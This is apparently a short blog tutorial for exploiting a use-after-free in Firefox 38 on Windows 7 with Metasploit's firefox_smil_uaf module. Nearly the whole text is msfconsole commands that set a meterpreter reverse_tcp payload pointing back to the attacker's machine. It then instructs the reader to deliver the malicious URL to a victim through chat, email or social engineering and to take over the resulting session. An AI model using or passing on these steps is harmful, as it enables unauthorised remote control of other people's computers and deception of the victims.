This module exploits an
out-of-bounds indexing/use-after-free condition present in
nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla
Firefox on Microsoft Windows.
Exploit Targets
Firefox 38
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open
Kali terminal type msfconsole
Now
type use exploit/windows/browser/firefox_smil_uaf
msf exploit (firefox_smil_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_smil_uaf)>set lhost 192.168.0.104 (IP
of Local Host)
msf exploit (firefox_smil_uaf)>set srvhost
192.168.0.104 (IP of Local Host)
msf exploit (firefox_smil_uaf)>set uripath / (IP
of Local Host)
msf exploit (firefox_smil_uaf)>exploit
Now an URL you should give to your victim http://192.168.0.104:8080/ victim
via chat or email or any social engineering technique.
Now
you have access to the victims PC. Use “Sessions -l”
and the Session number to connect to the session. And Now Type “sessions -i ID“
0 comments:
Post a Comment